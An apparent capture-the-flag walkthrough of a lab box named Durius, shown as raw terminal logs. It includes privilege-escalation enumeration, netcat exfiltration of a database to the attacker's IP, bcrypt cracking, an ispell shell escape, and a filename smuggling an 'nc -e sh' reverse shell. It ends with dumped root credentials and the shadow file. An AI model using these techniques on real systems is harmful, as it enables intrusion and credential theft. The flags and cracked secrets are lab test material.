Found /var/www/html/inc/data/database.db: empty
╔══════════╣ Web files?(output limit)
/var/www/:
total 12K
r-x 3 root root 4.0K Apr 17 2020 .
drwxr-xr-x 12 root root 4.0K Apr 23 2020 ..
drwxr-xr-x 8 www-data www-data 4.0K Apr 22 2020 html
/var/www/html:
total 68K
drwxr-xr-x 8 www-data www-data 4.0K Apr 22 2020 .
drwxr-xr-x 3 root root 4.0K Apr 17 2020 ..
╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw------- 1 root root 0 Apr 17 2020 /etc/.pwd.lock
-rw-r--r-- 1 root root 220 Nov 5 2016 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 0 Jan 26 17:57 /run/network/.ifstate.lock
-rw-r--r-- 1 root root 29 Apr 17 2020 /usr/lib/pymodules/python2.7/.path
-rwxr-xr-x 1 root root 623 Feb 19 2019 /usr/share/docker-ce/contrib/mkimage/.febootstrap-minimize
-rwxr-xr-x 1 www-data www-data 231 Feb 19 2020 /var/www/html/admin/.htaccess
-rwxr-xr-x 1 www-data www-data 0 Feb 19 2020 /var/www/html/inc/lang/se_swedish/.lock
-rwxr-xr-x 1 www-data www-data 0 Feb 19 2020 /var/www/html/inc/lang/ru_russian/.lock
-rwxr-xr-x 1 www-data www-data 0 Feb 19 2020 /var/www/html/inc/lang/fr_french/.lock
-rwxr-xr-x 1 www-data www-data 0 Feb 19 2020 /var/www/html/inc/lang/tr_turkish/.lock
-rwxr-xr-x 1 www-data www-data 0 Feb 19 2020 /var/www/html/inc/lang/id_indonesian/.lock
-rwxr-xr-x 1 www-data www-data 0 Feb 19 2020 /var/www/html/inc/lang/nl_dutch/.lock
-rwxr-xr-x 1 www-data www-data 0 Feb 19 2020 /var/www/html/inc/lang/it_italian/.lock
-rwxr-xr-x 1 www-data www-data 0 Feb 19 2020 /var/www/html/inc/lang/es_spanish/.lock
-rwxr-xr-x 1 www-data www-data 67 Feb 19 2020 /var/www/html/uploads/.htaccess
p, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rwxrwxrwx 1 www-data www-data 777018 Jan 7 21:42 /tmp/linpeas.sh
-rw-r--r-- 1 root root 522 Apr 17 2020 /var/backups/dpkg.diversions.0
-rw-r--r-- 1 root root 522585 Apr 22 2020 /var/backups/dpkg.status.0
-rw-r--r-- 1 root root 61440 Apr 23 2020 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 253 Apr 22 2020 /var/backups/dpkg.statoverride.0
-rw-r--r-- 1 root root 18571 Apr 22 2020 /var/backups/apt.extended_states.0
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/run/lock
/run/lock/apache2
/run/php
/tmp
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/tmp/.font-unix
#)You_can_write_even_more_files_inside_last_directory
/var/cache/apache2/mod_cache_disk
/var/lib/nginx/body
/var/lib/nginx/fastcgi
/var/lib/nginx/proxy
/var/lib/nginx/proxy/1
/var/lib/nginx/proxy/1/00
/var/lib/nginx/proxy/2
/var/lib/nginx/proxy/2/00
/var/lib/nginx/proxy/3
/var/lib/nginx/proxy/3/00
/var/lib/nginx/proxy/4
/var/lib/nginx/proxy/4/00
/var/lib/nginx/proxy/5
/var/lib/nginx/proxy/5/00
/var/lib/nginx/proxy/6
/var/lib/nginx/proxy/6/00
/var/lib/nginx/proxy/7
/var/lib/nginx/proxy/7/00
/var/lib/nginx/scgi
/var/lib/nginx/uwsgi
/var/lib/php/sessions
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/tmp
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
Group www-data:
/tmp/linpeas.sh
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/bin/systemd-ask-password
/bin/systemd-tty-ask-password-agent
/etc/pam.d/common-password
/usr/lib/git-core/git-credential
/usr/lib/git-core/git-credential-cache
/usr/lib/git-core/git-credential-cache--daemon
/usr/lib/git-core/git-credential-store
#)There are more creds/passwds files in the previous parent folder
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/pymodules/python2.7/ndg/httpsclient/test/pki/localhost.key
/usr/share/doc/git/contrib/credential
/usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c
/usr/share/doc/git/contrib/credential/netrc/git-credential-netrc
/usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c
/usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c
/usr/share/man/man1/git-credential-cache--daemon.1.gz
/usr/share/man/man1/git-credential-cache.1.gz
git-credential-store.1.gz
/usr/share/man/man1/git-credential.1.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/man/man7/gitcredentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/pam/common-password.md5sums
/usr/share/pyshared/ndg/httpsclient/test/pki/localhost.key
/var/cache/debconf/passwords.dat
/var/lib/pam/password
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
╔══════════╣ Searching passwords inside logs (limit 70)
192.168.66.253 - - [22/Apr/2020:11:05:21 -0500] "GET /P02rmMLv.pwd HTTP/1.1" 200 187 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:map_codes)"
192.168.66.253 - - [22/Apr/2020:11:05:22 -0500] "GET /P02rmMLv.PWD HTTP/1.1" 200 632 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:map_codes)"
192.168.66.253 - - [22/Apr/2020:11:05:25 -0500] "GET /guestbook/pwd HTTP/1.1" 200 215 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000044)"
192.168.66.253 - - [22/Apr/2020:11:05:25 -0500] "GET /password.inc HTTP/1.1" 200 1141 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000163)"
192.168.66.253 - - [22/Apr/2020:11:05:26 -0500] "GET /LOGIN.PWD HTTP/1.1" 200 178 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000436)"
192.168.66.253 - - [22/Apr/2020:11:05:27 -0500] "GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 400 172 "-" "-"
192.168.66.253 - - [22/Apr/2020:11:05:27 -0500] "GET /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 400 172 "-" "-"
192.168.66.253 - - [22/Apr/2020:11:05:27 -0500] "GET /../../../../../../../../../../etc/passwd HTTP/1.1" 400 172 "-" "-"
192.168.66.253 - - [22/Apr/2020:11:05:27 -0500] "GET ///etc/passwd HTTP/1.1" 200 194 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000543)"
192.168.66.253 - - [22/Apr/2020:11:05:27 -0500] "GET /DomainFiles/*//../../../../../../../../../../etc/passwd HTTP/1.1" 400 172 "-" "-"
192.168.66.253 - - [22/Apr/2020:11:05:28 -0500] "GET /chat/!pwds.txt HTTP/1.1" 200 262 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000993)"
2020-04-17 14:13:56 configure base-passwd:amd64 3.5.37 3.5.37
2020-04-17 14:13:56 install base-passwd:amd64 <none> 3.5.37
2020-04-17 14:13:56 status half-configured base-passwd:amd64 3.5.37
2020-04-17 14:13:56 status half-installed base-passwd:amd64 3.5.37
31mpasswd:amd64 3.5.37atus installed base-
2020-04-17 14:13:56 status unpacked base-passwd:amd64 3.5.37
2020-04-17 14:14:10 status half-configured base-passwd:amd64 3.5.37
2020-04-17 14:14:10 status half-installed base-passwd:amd64 3.5.37
2020-04-17 14:14:10 status unpacked base-passwd:amd64 3.5.37
2020-04-17 14:14:10 upgrade base-passwd:amd64 3.5.37 3.5.37
2020-04-17 14:14:20 install passwd:amd64 <none> 1:4.2-3+deb8u4
1mpasswd:amd64 1:4.2-3+deb8u4lf-installed
2020-04-17 14:14:22 status unpacked passwd:amd64 1:4.2-3+deb8u4
2020-04-17 14:14:35 configure base-passwd:amd64 3.5.37 <none>
2020-04-17 14:14:35 status half-configured base-passwd:amd64 3.5.37
2020-04-17 14:14:35 status installed base-passwd:amd64 3.5.37
2020-04-17 14:14:35 status unpacked base-passwd:amd64 3.5.37
2020-04-17 14:14:36 configure passwd:amd64 1:4.2-3+deb8u4 <none>
2020-04-17 14:14:36 status half-configured passwd:amd64 1:4.2-3+deb8u4
2020-04-17 14:14:36 status installed passwd:amd64 1:4.2-3+deb8u4
2020-04-17 14:14:36 status unpacked passwd:amd64 1:4.2-3+deb8u4
Description: Set up users and passwords
www-data@Durius:/tmp$ cd /var/www/html/inc/data/
cd /var/www/html/inc/data/
www-data@Durius:~/html/inc/data$ ls
ls
database.db
database.sdb
www-data@Durius:~/html/inc/data$ ls -lah
ls -lah
total 48K
drwxr-xr-x 2 www-data www-data 4.0K Jan 26 18:06 .
drwxr-xr-x 9 www-data www-data 4.0K Feb 19 2020 ..
-rwxr-xr-x 1 www-data www-data 0 Feb 19 2020 .gitkeep
-rw-r--r-- 1 root root 0 Apr 22 2020 database.db
-rw-r--r-- 1 www-data www-data 39K Jan 26 18:06 database.sdb
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ nc -nvlp 7777 > database.sdb
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::7777
Ncat: Listening on 0.0.0.0:7777
Ncat: Connection from 10.10.31.131.
Ncat: Connection from 10.10.31.131:41419.
^C
www-data@Durius:~/html/inc/data$ nc 10.8.19.103 7777 < database.sdb
nc 10.8.19.103 7777 < database.sdb
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ ls -lah
total 84K
drwxr-xr-x 2 kali kali 4.0K Jan 26 19:43 .
drwxr-xr-x 83 kali kali 12K Jan 26 12:24 ..
-rw-r--r-- 1 kali kali 10 Jan 26 12:54 'a.txt;nc 168301415 443 -e sh'
-rw-r--r-- 1 kali kali 39K Jan 26 19:45 database.sdb
-rw-r--r-- 1 kali kali 16K Jan 26 18:47 ferox-http_newcms_mofo_pwn:8888_-1674776830.state
-rw-r--r-- 1 kali kali 290 Jan 26 13:57 ftp.py
-rw-r--r-- 1 kali kali 207 Jan 26 16:10 shell.elf
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ file database.sdb
database.sdb: SQLite 3.x database, last written using SQLite version 3008007, page size 1024, file counter 158, database pages 39, 1st free page 33, free pages 2, cookie 0xe, schema 4, UTF-8, version-valid-for 158
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ sqlite3 database.sdb
SQLite version 3.40.0 2022-11-16 12:10:08
Enter ".help" for usage hints.
sqlite> .tables
blog login_attempts remember_me
blog_tags modules settings
blog_tags_relationship navs snippets
galleries navs_items users
galleries_items pages
sqlite> select * from users;
1|admin|Hugh Gant|My name is Hugh Gant. Da boss|$2y$10$HvIMAjTHGJXVeVyua.SxWum6ASmouY2svALXkZludVLPzvMbAAely|avatar5ea1f73cdf267.png|admin@mofo.pwn|admin|all
2|Ben|Clower||$2y$10$KSWWopGZdJhqP3iq8juuauMyNZjA8S8X/49lr7XntZKXsuWRUgaFC|avatar5ea05e10750a9.png|benclower@mofo.pwn|admin|all
sqlite> .exit
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
divisionminuscula (?)
1g 0:00:37:33 DONE (2023-01-26 20:29) 0.000443g/s 71.27p/s 71.27c/s 71.27C/s doglas..diva89
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
after 30 min
www-data@Durius:/home$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@Durius:/home$ su benclower
su benclower
Password: divisionminuscula
benclower@Durius:/home$ ls
ls
benclower me
benclower@Durius:/home$ cd benclower
cd benclower
benclower@Durius:~$ ls
ls
flag1.txt
benclower@Durius:~$ cat flag1.txt
cat flag1.txt
THM{Nice_Work_Got_Ben_Clower}
-rwxr-sr-x 1 root adm 88K Dec 12 2012 /usr/bin/ispell
SGID (Set Group ID) is a Unix/Linux file permission that allows a file or directory to run with the permissions of its group owner, rather than the permissions of the user who runs it. This means that any files or subdirectories created within the directory will also belong to the group owner and will have the same group permissions. This can be useful in a shared environment where multiple users need access to the same files or directories. The command to set SGID on a file or directory is "chmod g+s [file/directory]."
ispell is a command-line spell-checking program that was first developed in the 1970s. It is available for many different operating systems and can be used to check the spelling of text files or input from the user. It is commonly used to check the spelling of text written in languages such as English, French, and Spanish. It can also be used to create custom dictionaries for specific fields or industries.
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ echo "this is a test" | ispell
@(#) International Ispell Version 3.4.05 11 Mar 2022
word: ok
ok
ok
ok
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ ispell /bin/bash (anything)
then !ls (read)
!sh (bash)
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/kern.log
/var/log/auth.log
benclower@Durius:/home$ ispell /bin/bash
ispell /bin/bash
Screen too small: need at least 10 lines
Warning: Can't write to /bin/bash
dH File: /bin/bash [READONLY]
[SP] <number> R)epl A)ccept I)nsert L)ookup U)ncap Q)uit e(X)it or ? for help
!ls
!ls
benclower me
-- Type space to continue --
dH File: /bin/bash [READONLY]
[SP] <number> R)epl A)ccept I)nsert L)ookup U)ncap Q)uit e(X)it or ? for help
�A File: /bin/bash [READONLY]
[SP] <number> R)epl A)ccept I)nsert L)ookup U)ncap Q)uit e(X)it or ? for help
NR File: /bin/bash [READONLY]
[SP] <number> R)epl A)ccept I)nsert L)ookup U)ncap Q)uit e(X)it or ? for help
�F File: /bin/bash [READONLY]
[SP] <number> R)epl A)ccept I)nsert L)ookup U)ncap Q)uit e(X)it or ? for help
!sh
!sh
$ cat /var/log/auth.log | grep password
cat /var/log/auth.log | grep password
Apr 17 09:19:36 CarpeDiem1 sshd[716]: Accepted password for me from 192.168.225.1 port 62930 ssh2
Apr 17 09:41:34 CarpeDiem1 sshd[10163]: Accepted password for me from 192.168.225.1 port 63510 ssh2
Apr 17 09:54:41 CarpeDiem1 sshd[2073]: Accepted password for me from 192.168.225.1 port 63805 ssh2
Apr 22 06:35:22 CarpeDiem1 sshd[2566]: Accepted password for me from 192.168.66.1 port 50538 ssh2
Apr 22 06:46:15 Durius sshd[1160]: Accepted password for me from 192.168.66.1 port 51004 ssh2
Apr 22 06:54:34 Durius sshd[1205]: Accepted password for me from 192.168.66.1 port 51219 ssh2
Apr 22 07:03:24 Durius sshd[1251]: Accepted password for me from 192.168.66.1 port 51388 ssh2
Apr 22 09:10:36 Durius sshd[16979]: Accepted password for me from 192.168.66.1 port 54602 ssh2
Apr 22 09:13:28 Durius sshd[16989]: Accepted password for me from 192.168.66.1 port 54637 ssh2
Apr 22 09:13:43 Durius sshd[16992]: Accepted password for me from 192.168.66.1 port 54642 ssh2
Apr 22 09:49:43 Durius sshd[1324]: Accepted password for me from 192.168.66.1 port 55557 ssh2
Apr 22 09:57:52 Durius sshd[1295]: Accepted password for me from 192.168.66.1 port 55693 ssh2
Apr 22 10:06:18 Durius sshd[1599]: Accepted password for me from 192.168.66.1 port 55883 ssh2
Apr 22 10:10:04 Durius passwd[1903]: pam_unix(passwd:chauthtok): password changed for bendover
Apr 22 14:57:29 Durius sshd[7947]: Accepted password for me from 192.168.66.1 port 63898 ssh2
Apr 22 15:00:53 Durius sshd[7950]: Accepted password for me from 192.168.66.1 port 64299 ssh2
Apr 22 15:01:08 Durius passwd[7979]: pam_unix(passwd:chauthtok): password changed for bendover
Apr 22 16:55:13 Durius sshd[1526]: Accepted password for me from 192.168.66.1 port 51165 ssh2
Apr 22 17:28:25 Durius sshd[1856]: Accepted password for me from 192.168.66.1 port 52087 ssh2
Apr 22 17:30:24 Durius passwd[1884]: pam_unix(passwd:chauthtok): password changed for root
Apr 22 17:31:29 Durius sshd[1891]: Failed password for invalid user sTertXssd65rfd_sdf from 192.168.66.1 port 52129 ssh2
Apr 22 17:31:29 Durius sshd[1891]: Failed password for invalid user sTertXssd65rfd_sdf from 192.168.66.1 port 52129 ssh2
Apr 23 01:12:27 Durius sshd[2662]: Accepted password for me from 192.168.66.1 port 62962 ssh2
Apr 23 02:45:54 Durius sshd[15237]: Accepted password for mofo from 192.168.66.1 port 65204 ssh2
Apr 23 02:51:26 Durius sshd[15259]: Accepted password for mofo from 192.168.66.1 port 65385 ssh2
Apr 23 02:55:08 Durius sshd[1256]: Accepted passwoApr 23 02:55:08 Durius sshd[1256]: Accepted password for mofo from 192.168.66.1 port 65457 ssh2
Apr 23 11:33:11 Durius sshd[11809]: Accepted password for mofo from 192.168.66.1 port 60235 ssh2
Apr 23 15:11:31 Durius sshd[1443]: Accepted password for me from 192.168.66.1 port 51085 ssh2
Apr 23 15:46:35 Durius sshd[1370]: Accepted password for me from 192.168.66.1 port 52654 ssh2
$ su root
su root
Password: sTertXssd65rfd_sdf
root@Durius:/home# cd /root
cd /root
root@Durius:~# ls
ls
flag2.txt
root@Durius:~# cat flag2.txt
cat flag2.txt
THM{Great_work!_You_Rooted_TempusFugitDurius!}
root@Durius:~# ls -lah
ls -lah
total 28K
drwx------ 4 root root 4.0K Apr 23 2020 .
drwxr-xr-x 22 root root 4.0K Apr 17 2020 ..
lrwxrwxrwx 1 root root 9 Apr 22 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 47 Apr 23 2020 flag2.txt
drwx------ 2 root root 4.0K Apr 23 2020 .gnupg
-rw-r--r-- 1 root root 140 Nov 19 2007 .profile
drwx------ 2 root root 4.0K Apr 17 2020 .ssh
root@Durius:~# cat .bash_history
cat .bash_history
root@Durius:~# cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
statd:x:105:65534::/var/lib/nfs:/bin/false
messagebus:x:106:112::/var/run/dbus:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
me:x:1000:1000:me,,,:/home/me:/bin/bash
benclower:x:1001:1001:Ben Clower,,,:/home/benclower:/bin/bash
root@Durius:~# cat /etc/shadow
cat /etc/shadow
root:$6$gajQUlYj$.vIsgQ.l/7ZCh6xTEbCzf2Ti7k83pZZve7lvHHHmdUrXEKWbCv0UtsgvWRm4QfPuB5Mg4WjW9Y5QcKycyPAAD.:18374:0:99999:7:::
daemon:*:18369:0:99999:7:::
bin:*:18369:0:99999:7:::
sys:*:18369:0:99999:7:::
sync:*:18369:0:99999:7:::
games:*:18369:0:99999:7:::
man:*:18369:0:99999:7:::
lp:*:18369:0:99999:7:::
mail:*:18369:0:99999:7:::
news:*:18369:0:99999:7:::
uucp:*:18369:0:99999:7:::
proxy:*:18369:0:99999:7:::
www-data:*:18369:0:99999:7:::
backup:*:18369:0:99999:7:::
list:*:18369:0:99999:7:::
irc:*:18369:0:99999:7:::
gnats:*:18369:0:99999:7:::
nobody:*:18369:0:99999:7:::
systemd-timesync:*:18369:0:99999:7:::
systemd-network:*:18369:0:99999:7:::
systemd-resolve:*:18369:0:99999:7:::
systemd-bus-proxy:*:18369:0:99999:7:::
Debian-exim:!:18369:0:99999:7:::
statd:*:18369:0:99999:7:::
messagebus:*:18369:0:99999:7:::
sshd:*:18369:0:99999:7:::
me:$6$JMeslftJ$Xd6fu6ugqKxYIsxfBhqPFmb7PaYoH0HIJNX7rB3hepGzJrzjkmBmGvgar9OILwosmNRgwAaXiOcRhWyF8tg53.:18369:0:99999:7:::
benclower:$6$ymSNcGgc$0zCfgdZ9BgY7G04RYaFYMKawc6nO.XoGQLC5XcH39xpLokRsK/koI12FR8u1n5V.hZwr7cz01E8jcYZl06cCZ1:18374:0:99999:7:::